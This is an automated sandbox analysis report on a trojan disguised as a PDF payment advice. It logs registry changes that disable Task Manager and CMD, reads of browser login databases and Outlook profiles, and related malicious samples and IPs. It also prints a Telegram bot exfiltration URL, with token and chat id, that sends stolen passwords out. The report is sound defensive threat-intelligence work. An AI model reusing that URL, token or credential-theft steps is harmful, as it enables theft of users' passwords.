              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE TT07180016-24_pdf.exe PID: 7788, type: MEMORYSTR
              Source: Yara matchFile source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE TT07180016-24_pdf.exe PID: 7788, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE TT07180016-24_pdf.exe PID: 7788, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE TT07180016-24_pdf.exe PID: 7788, type: MEMORYSTR
              Source: Yara matchFile source: 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE TT07180016-24_pdf.exe PID: 7788, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              1
              Masquerading
              1
              OS Credential Dumping
              21
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
              Process Injection
              31
              Disable or Modify Tools
              LSASS Memory31
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              31
              Virtualization/Sandbox Evasion
              Security Account Manager1
              Application Window Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Access Token Manipulation
              NTDS1
              System Network Configuration Discovery
              Distributed Component Object Model1
              Clipboard Data
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Process Injection
              LSA Secrets2
              File and Directory Discovery
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Deobfuscate/Decode Files or Information
              Cached Domain Credentials215
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
              Obfuscated Files or Information
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PAYMENT ADVICE TT07180016-24_pdf.exe50%ReversingLabsWin32.Trojan.Guloader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsxC748.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              172.217.19.174
              truefalse
                high
                drive.usercontent.google.com
                142.250.200.225
                truefalse
                  high
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      158.101.44.242
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.google.comPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://checkip.dyndns.org/7fPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2960541313.0000000036FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/botPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://translate.google.com/translate_a/element.jsPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.000000000409E000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.0000000004038000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org/VPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2960541313.0000000036FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034828000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.orgPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.usercontent.google.com/PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.00000000040A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034791000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.comPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2136489225.00000000040AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.comPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorPAYMENT ADVICE TT07180016-24_pdf.exefalse
                                                              high
                                                              http://api.telegram.orgPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034998000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BC7000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000348BA000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034BA8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.00000000349E8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034B07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.usercontent.google.com/qPAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000003.2183352064.00000000040AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2935639823.00000000040A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/PAYMENT ADVICE TT07180016-24_pdf.exe, 00000004.00000002.2958960701.0000000034810000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      104.21.67.152
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.200.225
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      158.101.44.242
                                                                      checkip.dyndns.comUnited States
                                                                      31898ORACLE-BMC-31898USfalse
                                                                      172.217.19.174
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1576542
                                                                      Start date and time:2024-12-17 08:41:20 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 3s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:6
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 95%
                                                                      • Number of executed functions: 144
                                                                      • Number of non-executed functions: 109
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.43, 172.202.163.200
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                      TimeTypeDescription
                                                                      02:43:12API Interceptor867x Sleep call for process: PAYMENT ADVICE TT07180016-24_pdf.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.220pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                            PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          104.21.67.152HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              158.101.44.242Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              checkip.dyndns.compre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.6.168
                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              reallyfreegeoip.orgpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 188.114.97.3
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              api.telegram.orgpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              69633f.msiGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              CLOUDFLARENETUSei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 172.67.140.151
                                                                                                              tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.6
                                                                                                              pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 172.67.177.134
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.18.11.207
                                                                                                              Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.32.1
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 172.67.210.11
                                                                                                              Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.2.70
                                                                                                              DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.21.48.233
                                                                                                              ORACLE-BMC-31898USpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                              • 147.154.227.160
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 193.122.130.0
                                                                                                              end.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 130.61.86.87
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
